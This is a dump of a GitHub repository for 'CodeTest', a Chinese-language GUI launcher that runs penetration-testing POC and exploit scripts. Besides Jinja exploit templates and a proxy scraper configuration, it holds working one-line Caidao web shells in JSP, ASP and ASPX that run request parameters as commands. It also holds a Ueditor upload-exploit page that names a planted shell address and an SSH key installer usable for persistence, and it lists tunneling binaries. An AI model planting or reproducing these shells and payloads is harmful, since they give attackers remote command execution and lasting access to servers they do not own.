14 | 15 | import sys 16 | 17 | PY2 = sys.version_info[0] == 2 18 | PY3 = sys.version_info[0] == 3 19 | 20 | if PY3: 21 | def iteritems(d, **kw): 22 | return iter(d.items(**kw)) 23 | else: 24 | def iteritems(d, **kw): 25 | return d.iteritems(**kw) 26 | 27 | if PY3: 28 | from urllib.parse import urlparse 29 | else: 30 | from urlparse import urlparse 31 | 32 | if PY3: 33 | from imp import reload as reload_six 34 | else: 35 | reload_six = reload 36 | 37 | if PY3: 38 | from queue import Empty, Queue 39 | else: 40 | from Queue import Empty, Queue 41 | 42 | 43 | def withMetaclass(meta, *bases): 44 | """Create a base class with a metaclass.""" 45 | 46 | # This requires a bit of explanation: the basic idea is to make a dummy 47 | # metaclass for one level of class instantiation that replaces itself with 48 | # the actual metaclass. 49 | class MetaClass(meta): 50 | 51 | def __new__(cls, name, this_bases, d): 52 | return meta(name, bases, d) 53 | 54 | return type.__new__(MetaClass, 'temporary_class', (), {}) 55 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Welcome to CodeTest

2 | 3 | ### :point_right:关于本项目 4 | 5 | >本项目的主要目的: 针对日常收集的Python POC\EXP测试脚本,使用可视化界面统一执行入口,方便运行。 6 | > 7 | >本项目适合人群: 有Python基础的渗透测试人员(工具自带简易编辑器,可修改脚本内参数,重新加载后可灵活使用脚本进行测试) 8 | > 9 | >可视化界面开发库: Tkinter 10 | > 11 | >python版本: 3.5+ 12 | 13 | ### :bulb:POC\EXP 参考链接 14 | 15 | ``` 16 | https://github.com/Ascotbe/Medusa 17 | https://github.com/zhzyker/vulmap 18 | https://github.com/Python3WebSpider/ProxyPool 19 | ``` 20 | 21 | 22 | ### :book:使用说明 23 | 24 | ``` 25 | (一)下载文件 26 | git clone https://github.com/codeyso/CodeTest.git 27 | cd CodeTest 28 | 29 | (二)安装依赖 30 | pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 31 | 注意: ~\Python3\Lib\site-packages,找到这个路径,下面有一个文件夹叫做crypto,将小写c改成大写C 32 | 注意: 建议安装之前更新pip (python -m pip install --upgrade pip) 33 | 34 | (三)使用工具 35 | 1) 双击 CodeTest.bat 36 | 2) pythonw3 -B CodeTest.pyw 37 | 38 | (四)备注: 如果GitHub图片显示不出来,修改hosts 39 | C:\Windows\System32\drivers\etc\hosts 40 | 41 | 在文件末尾添加 42 | # GitHub Start 43 | 192.30.253.112 Build software better, together 44 | 192.30.253.119 gist.github.com 45 | 151.101.184.133 assets-cdn.github.com 46 | 151.101.184.133 raw.githubusercontent.com 47 | 151.101.184.133 gist.githubusercontent.com 48 | 151.101.184.133 cloud.githubusercontent.com 49 | 151.101.184.133 camo.githubusercontent.com 50 | 151.101.184.133 avatars0.githubusercontent.com 51 | 151.101.184.133 avatars1.githubusercontent.com 52 | 151.101.184.133 avatars2.githubusercontent.com 53 | 151.101.184.133 avatars3.githubusercontent.com 54 | 151.101.184.133 avatars4.githubusercontent.com 55 | 151.101.184.133 avatars5.githubusercontent.com 56 | 151.101.184.133 avatars6.githubusercontent.com 57 | 151.101.184.133 avatars7.githubusercontent.com 58 | 151.101.184.133 avatars8.githubusercontent.com 59 | 60 | # GitHub End 61 | ``` 62 | 63 | 64 | ### :checkered_flag:模板 65 | #### POC 66 | 67 | ``` 68 | def check(**kwargs): 69 | url = kwargs['url']#/*str*/ 70 | print('输出结果') 71 | print(url) 72 | '''此处的返回状态码用于批量验证 73 | if True: 74 | return 1 75 | else: 76 | return 77 | ''' 78 | ``` 79 | 80 | 81 | #### EXP 82 | 83 | ``` 84 | 有专用的EXP生成界面 85 | ``` 86 | 87 | 88 | ### :clipboard:功能界面 89 | #### 漏洞扫描界面 90 | ![漏洞扫描界面](https://github.com/codeyso/CodeTest/blob/main/img/1.png "漏洞扫描界面") 91 | 92 | #### 漏洞利用界面 93 | ![漏洞利用界面](https://github.com/codeyso/CodeTest/blob/main/img/2.png "漏洞利用界面") 94 | 95 | ### :open_file_folder:使用示例 96 | >案例参考:https://mp.weixin.qq.com/s/xwh81ZeE0Lgx-iIpqZI1_g 97 | 98 | -------------------------------------------------------------------------------- /Template/EXP.j2: -------------------------------------------------------------------------------- 1 | from util.ExpRequest import ExpRequest,Output 2 | from operator import methodcaller 3 | import prettytable as pt 4 | """ 5 | import util.globalvar as GlobalVar 6 | from ClassCongregation import ysoserial_payload,Dnslog 7 | DL = Dnslog() 8 | DL.dns_host() 9 | DL.result() 10 | """ 11 | class {{service.entry_nodes.vulname}}(): 12 | def __init__(self, **env): 13 | """ 14 | 基础参数初始化 15 | """ 16 | self.url = env.get('url') 17 | self.cookie = env.get('cookie') 18 | self.cmd = env.get('cmd') 19 | self.pocname = env.get('pocname') 20 | self.vuln = env.get('vuln') 21 | self.timeout = int(env.get('timeout')) 22 | self.retry_time = int(env.get('retry_time')) 23 | self.retry_interval = int(env.get('retry_interval')) 24 | self.status = env.get('status') 25 | 26 | def {{service.entry_nodes.cvename}}(self): 27 | appName = '{{service.entry_nodes.vulname}}' 28 | pocname = '{{service.entry_nodes.cvename}}' 29 | path = '{{service.header_nodes.headinfo.path}}' 30 | method = '{{service.header_nodes.headinfo.method}}' 31 | desc = '{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}' 32 | data = '{{service.header_nodes.content.data}}' 33 | headers = {{service.header_nodes.headinfo.header}} 34 | #输出类 35 | output = Output(pocname) 36 | #请求类 37 | exprequest = ExpRequest(pocname, output) 38 | try: 39 | if self.vuln == 'False': 40 | r = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False) 41 | {{service.entry_nodes.condition}} 42 | self.status = 'success' 43 | output.no_echo_success(method, desc) 44 | else: 45 | output.fail() 46 | else: 47 | result = exprequest.{{service.header_nodes.headinfo.method}}(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text 48 | print(result) 49 | except Exception as error: 50 | output.error_output(str(error)) 51 | 52 | tb = pt.PrettyTable() 53 | tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description'] 54 | tb.align['Target type'] = 'l' 55 | tb.align['Vuln Name'] = 'l' 56 | tb.align['Impact Version && Vulnerability description'] = 'l' 57 | tb.add_row([ 58 | "{{service.entry_nodes.vulname}}", 59 | "{{service.entry_nodes.cvename}}", 60 | "{{service.entry_nodes.infoname}} {{service.entry_nodes.banner}}" 61 | ]) 62 | print(tb) 63 | 64 | def check(**kwargs): 65 | result_list = [] 66 | result_list.append('----------------------------') 67 | Exp{{service.entry_nodes.vulname}} = {{service.entry_nodes.vulname}}(**kwargs) 68 | if kwargs['pocname'] != 'ALL': 69 | func = getattr(Exp{{service.entry_nodes.vulname}}, kwargs['pocname'])#返回对象函数属性值,可以直接调用 70 | func()#调用函数 71 | return Exp{{service.entry_nodes.vulname}}.status 72 | else:#调用所有函数 73 | for func in dir({{service.entry_nodes.vulname}}): 74 | if not func.startswith("__"): 75 | methodcaller(func)(Exp{{service.entry_nodes.vulname}}) 76 | result_list.append(func+' -> '+Exp{{service.entry_nodes.vulname}}.status) 77 | Exp{{service.entry_nodes.vulname}}.status = 'fail' 78 | result_list.append('----------------------------') 79 | return '\n'.join(result_list) -------------------------------------------------------------------------------- /Template/POC.j2: -------------------------------------------------------------------------------- 1 | from ClassCongregation import color 2 | 3 | def check(**kwargs): 4 | url = kwargs['url']#/*str*/ 5 | print('输出结果') 6 | print(url) 7 | ''' 8 | if True: 9 | return 1 10 | else: 11 | return 12 | ''' -------------------------------------------------------------------------------- /Template/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Template/__init__.py -------------------------------------------------------------------------------- /data/api-docs.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/data/api-docs.json -------------------------------------------------------------------------------- /data/bool_blind.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | > 24 | -------------------------------------------------------------------------------- /data/error.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /data/time_blind.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | > 13 | -------------------------------------------------------------------------------- /execScripts/Caidao_cmd.jsp: -------------------------------------------------------------------------------- 1 | <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> -------------------------------------------------------------------------------- /execScripts/Caidao_shell.asp: -------------------------------------------------------------------------------- 1 | <%execute(request("value"))%> -------------------------------------------------------------------------------- /execScripts/Caidao_shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> -------------------------------------------------------------------------------- /execScripts/Caidao_shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/1.png -------------------------------------------------------------------------------- /img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/img/2.png -------------------------------------------------------------------------------- /lib/green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/green.png -------------------------------------------------------------------------------- /lib/note.txt: -------------------------------------------------------------------------------- 1 | #此处存放临时数据 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 | 307 | 308 | 309 | 310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | 363 | 364 | 365 | 366 | 367 | 368 | 369 | 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 379 | 380 | 381 | 382 | 383 | 384 | 385 | 386 | 387 | 388 | 389 | 390 | 391 | 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 436 | 437 | 438 | 439 | 440 | 441 | 442 | 443 | 444 | 445 | 446 | 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 488 | 489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 518 | 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | 531 | 532 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 566 | 567 | 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | 719 | 720 | 721 | 722 | 723 | 724 | 725 | 726 | 727 | 728 | 729 | 730 | 731 | 732 | 733 | 734 | 735 | 736 | 737 | 738 | 739 | 740 | 741 | 742 | 743 | 744 | 745 | 746 | 747 | 748 | 749 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 760 | 761 | 762 | 763 | 764 | 765 | 766 | 767 | 768 | 769 | 770 | 771 | 772 | 773 | 774 | 775 | 776 | 777 | 778 | 779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | 807 | 808 | 809 | 810 | 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 825 | 826 | 827 | 828 | 829 | 830 | 831 | 832 | 833 | 834 | 835 | 836 | 837 | 838 | 839 | 840 | 841 | 842 | 843 | 844 | 845 | 846 | 847 | 848 | 849 | 850 | 851 | 852 | 853 | 854 | 855 | 856 | 857 | 858 | 859 | 860 | 861 | 862 | 863 | 864 | 865 | 866 | 867 | 868 | 869 | 870 | 871 | 872 | 873 | 874 | 875 | 876 | 877 | 878 | 879 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 898 | 899 | 900 | 901 | 902 | 903 | 904 | 905 | 906 | 907 | 908 | 909 | 910 | 911 | 912 | 913 | 914 | 915 | 916 | 917 | 918 | 919 | 920 | 921 | 922 | 923 | 924 | 925 | 926 | 927 | 928 | 929 | 930 | 931 | 932 | 933 | 934 | 935 | 936 | 937 | 938 | 939 | 940 | 941 | 942 | 943 | 944 | 945 | 946 | 947 | 948 | 949 | 950 | 951 | 952 | 953 | 954 | 955 | 956 | 957 | 958 | 959 | 960 | 961 | 962 | 963 | 964 | 965 | -------------------------------------------------------------------------------- /lib/red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/lib/red.png -------------------------------------------------------------------------------- /log/info.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/log/info.txt -------------------------------------------------------------------------------- /payload_html/Ueditor/Ueditor.html: -------------------------------------------------------------------------------- 1 |
2 | 3 |

shell addr: http://**.**.**.**/cest.png?.aspx

4 | 5 | 6 | 7 |
-------------------------------------------------------------------------------- /payload_html/Ueditor/ueditor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/Ueditor/ueditor.png -------------------------------------------------------------------------------- /payload_html/chrome_payload.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /payload_html/key.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #============================================================= 3 | # https://github.com/P3TERX/SSH_Key_Installer 4 | # Description: Install SSH keys via GitHub, URL or local files 5 | # Version: 2.7 6 | # Author: P3TERX 7 | # Blog: https://p3terx.com 8 | #============================================================= 9 | 10 | VERSION=2.7 11 | RED_FONT_PREFIX="\033[31m" 12 | LIGHT_GREEN_FONT_PREFIX="\033[1;32m" 13 | FONT_COLOR_SUFFIX="\033[0m" 14 | INFO="[${LIGHT_GREEN_FONT_PREFIX}INFO${FONT_COLOR_SUFFIX}]" 15 | ERROR="[${RED_FONT_PREFIX}ERROR${FONT_COLOR_SUFFIX}]" 16 | [ $EUID != 0 ] && SUDO=sudo 17 | 18 | USAGE() { 19 | echo " 20 | SSH Key Installer $VERSION 21 | 22 | Usage: 23 | bash <(curl -fsSL git.io/key.sh) [options...] 24 | 25 | Options: 26 | -o Overwrite mode, this option is valid at the top 27 | -g Get the public key from GitHub, the arguments is the GitHub ID 28 | -u Get the public key from the URL, the arguments is the URL 29 | -f Get the public key from the local file, the arguments is the local file path 30 | -p Change SSH port, the arguments is port number 31 | -d Disable password login" 32 | } 33 | 34 | if [ $# -eq 0 ]; then 35 | USAGE 36 | exit 1 37 | fi 38 | 39 | get_github_key() { 40 | if [ "${KEY_ID}" == '' ]; then 41 | read -e -p "Please enter the GitHub account:" KEY_ID 42 | [ "${KEY_ID}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1 43 | fi 44 | echo -e "${INFO} The GitHub account is: ${KEY_ID}" 45 | echo -e "${INFO} Get key from GitHub..." 46 | PUB_KEY=$(curl -fsSL https://github.com/${KEY_ID}.keys) 47 | if [ "${PUB_KEY}" == 'Not Found' ]; then 48 | echo -e "${ERROR} GitHub account not found." 49 | exit 1 50 | elif [ "${PUB_KEY}" == '' ]; then 51 | echo -e "${ERROR} This account ssh key does not exist." 52 | exit 1 53 | fi 54 | } 55 | 56 | get_url_key() { 57 | if [ "${KEY_URL}" == '' ]; then 58 | read -e -p "Please enter the URL:" KEY_URL 59 | [ "${KEY_URL}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1 60 | fi 61 | echo -e "${INFO} Get key from URL..." 62 | PUB_KEY=$(curl -fsSL ${KEY_URL}) 63 | } 64 | 65 | get_loacl_key() { 66 | if [ "${KEY_PATH}" == '' ]; then 67 | read -e -p "Please enter the path:" KEY_PATH 68 | [ "${KEY_PATH}" == '' ] && echo -e "${ERROR} Invalid input." && exit 1 69 | fi 70 | echo -e "${INFO} Get key from $(${KEY_PATH})..." 71 | PUB_KEY=$(cat ${KEY_PATH}) 72 | } 73 | 74 | install_key() { 75 | [ "${PUB_KEY}" == '' ] && echo "${ERROR} ssh key does not exist." && exit 1 76 | if [ ! -f "${HOME}/.ssh/authorized_keys" ]; then 77 | echo -e "${INFO} '${HOME}/.ssh/authorized_keys' is missing..." 78 | echo -e "${INFO} Creating ${HOME}/.ssh/authorized_keys..." 79 | mkdir -p ${HOME}/.ssh/ 80 | touch ${HOME}/.ssh/authorized_keys 81 | if [ ! -f "${HOME}/.ssh/authorized_keys" ]; then 82 | echo -e "${ERROR} Failed to create SSH key file." 83 | else 84 | echo -e "${INFO} Key file created, proceeding..." 85 | fi 86 | fi 87 | if [ "${OVERWRITE}" == 1 ]; then 88 | echo -e "${INFO} Overwriting SSH key..." 89 | echo -e "${PUB_KEY}\n" >${HOME}/.ssh/authorized_keys 90 | else 91 | echo -e "${INFO} Adding SSH key..." 92 | echo -e "\n${PUB_KEY}\n" >>${HOME}/.ssh/authorized_keys 93 | fi 94 | chmod 700 ${HOME}/.ssh/ 95 | chmod 600 ${HOME}/.ssh/authorized_keys 96 | [[ $(grep "${PUB_KEY}" "${HOME}/.ssh/authorized_keys") ]] && 97 | echo -e "${INFO} SSH Key installed successfully!" || { 98 | echo -e "${ERROR} SSH key installation failed!" 99 | exit 1 100 | } 101 | } 102 | 103 | change_port() { 104 | echo -e "${INFO} Changing SSH port to ${SSH_PORT} ..." 105 | if [ $(uname -o) == Android ]; then 106 | [[ -z $(grep "Port " "$PREFIX/etc/ssh/sshd_config") ]] && 107 | echo -e "${INFO} Port ${SSH_PORT}" >>$PREFIX/etc/ssh/sshd_config || 108 | sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" $PREFIX/etc/ssh/sshd_config 109 | [[ $(grep "Port " "$PREFIX/etc/ssh/sshd_config") ]] && { 110 | echo -e "${INFO} SSH port changed successfully!" 111 | RESTART_SSHD=2 112 | } || { 113 | RESTART_SSHD=0 114 | echo -e "${ERROR} SSH port change failed!" 115 | exit 1 116 | } 117 | else 118 | $SUDO sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" /etc/ssh/sshd_config && { 119 | echo -e "${INFO} SSH port changed successfully!" 120 | RESTART_SSHD=1 121 | } || { 122 | RESTART_SSHD=0 123 | echo -e "${ERROR} SSH port change failed!" 124 | exit 1 125 | } 126 | fi 127 | } 128 | 129 | disable_password() { 130 | if [ $(uname -o) == Android ]; then 131 | sed -i "s@.*\(PasswordAuthentication \).*@\1no@" $PREFIX/etc/ssh/sshd_config && { 132 | RESTART_SSHD=2 133 | echo -e "${INFO} Disabled password login in SSH." 134 | } || { 135 | RESTART_SSHD=0 136 | echo -e "${ERROR} Disable password login failed!" 137 | exit 1 138 | } 139 | else 140 | $SUDO sed -i "s@.*\(PasswordAuthentication \).*@\1no@" /etc/ssh/sshd_config && { 141 | RESTART_SSHD=1 142 | echo -e "${INFO} Disabled password login in SSH." 143 | } || { 144 | RESTART_SSHD=0 145 | echo -e "${ERROR} Disable password login failed!" 146 | exit 1 147 | } 148 | fi 149 | } 150 | 151 | while getopts "og:u:f:p:d" OPT; do 152 | case $OPT in 153 | o) 154 | OVERWRITE=1 155 | ;; 156 | g) 157 | KEY_ID=$OPTARG 158 | get_github_key 159 | install_key 160 | ;; 161 | u) 162 | KEY_URL=$OPTARG 163 | get_url_key 164 | install_key 165 | ;; 166 | f) 167 | KEY_PATH=$OPTARG 168 | get_loacl_key 169 | install_key 170 | ;; 171 | p) 172 | SSH_PORT=$OPTARG 173 | change_port 174 | ;; 175 | d) 176 | disable_password 177 | ;; 178 | ?) 179 | USAGE 180 | exit 1 181 | ;; 182 | :) 183 | USAGE 184 | exit 1 185 | ;; 186 | *) 187 | USAGE 188 | exit 1 189 | ;; 190 | esac 191 | done 192 | 193 | if [ "$RESTART_SSHD" = 1 ]; then 194 | echo -e "${INFO} Restarting sshd..." 195 | $SUDO systemctl restart sshd && echo -e "${INFO} Done." 196 | elif [ "$RESTART_SSHD" = 2 ]; then 197 | echo -e "${INFO} Restart sshd or Termux App to take effect." 198 | fi 199 | -------------------------------------------------------------------------------- /payload_html/kindeditor.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uploader 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 78 | 79 | 80 | 81 |
82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 |
94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /payload_html/npc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc -------------------------------------------------------------------------------- /payload_html/npc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc.exe -------------------------------------------------------------------------------- /payload_html/nps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/nps -------------------------------------------------------------------------------- /payload_html/wget.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/wget.exe -------------------------------------------------------------------------------- /python.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/python.ico -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests==2.26.0 2 | pysocks==1.7.1 3 | prettytable==2.4.0 4 | exp10it==2.7.81 5 | Crypto==1.4.1 6 | click==8.0.1 7 | pycryptodome==3.10.1 8 | jinja2==3.0.3 9 | requests_toolbelt==0.9.1 10 | openpyxl==3.0.9 11 | ajpy==0.0.5 -------------------------------------------------------------------------------- /settings.py: -------------------------------------------------------------------------------- 1 | from tkinter import StringVar,IntVar 2 | import os 3 | import sys 4 | 5 | ###获取项目路径### 6 | curPath = os.path.dirname(os.path.realpath(sys.executable))#当前执行路径 7 | scriptPath = os.getcwd() 8 | 9 | #代理网站 10 | Proxy_page = IntVar(value=1)#爬取代理的页数 11 | Proxy_webtitle = StringVar(value='米扑代理')#爬取代理的页数 12 | Proxy_web = { 13 | '米扑代理' : 'freeProxy01', 14 | '66代理' : 'freeProxy02', 15 | 'pzzqz' : 'freeProxy03', 16 | '神鸡代理' : 'freeProxy04', 17 | '快代理' : 'freeProxy05', 18 | '极速代理' : 'freeProxy06', 19 | '云代理' : 'freeProxy07', 20 | '小幻代理' : 'freeProxy08', 21 | '免费代理库' : 'freeProxy09', 22 | '89免费代理' : 'freeProxy13', 23 | '西拉代理' : 'freeProxy14', 24 | } 25 | 26 | #代理界面_Proxy 27 | Proxy_type = StringVar(value='HTTP/HTTPS')#代理界面_代理类型_HTTP 28 | Proxy_CheckVar1 = IntVar()#代理界面_控制代理开关1 29 | Proxy_CheckVar2 = IntVar()#代理界面_控制代理开关0 30 | Proxy_addr = StringVar(value='127.0.0.1')#代理界面_代理IP 31 | Proxy_port = StringVar(value='8080')#代理界面_代理端口 32 | 33 | #漏洞扫描界面_A 34 | Ent_A_Top_thread = StringVar(value='3')#漏洞扫描界面_顶部_线程_3 35 | Ent_A_Top_Text = '''[*]请输入正确的网址,比如 [http://www.baidu.com] 36 | [*]请注意有些需要使用域名, 有些需要使用IP! 37 | [*]漏洞扫描模块是检测漏洞的, 命令执行需要在漏洞利用模块使用! 38 | [-]有处BUG, 在读取py文件时, 如果引号前面有字母存在会出错, 如 f'', r'' 39 | ''' 40 | 41 | #漏洞利用界面_B 42 | Ent_B_Top_url = StringVar(value='')#漏洞利用界面_顶部_目标地址 43 | Ent_B_Top_cookie = StringVar(value='暂时无用')#漏洞利用界面_顶部_Cookie 44 | Ent_B_Top_vulname = StringVar(value='请选择漏洞名称')#漏洞利用界面_顶部_漏洞名称_请选择漏洞名称 45 | Ent_B_Top_vulmethod = 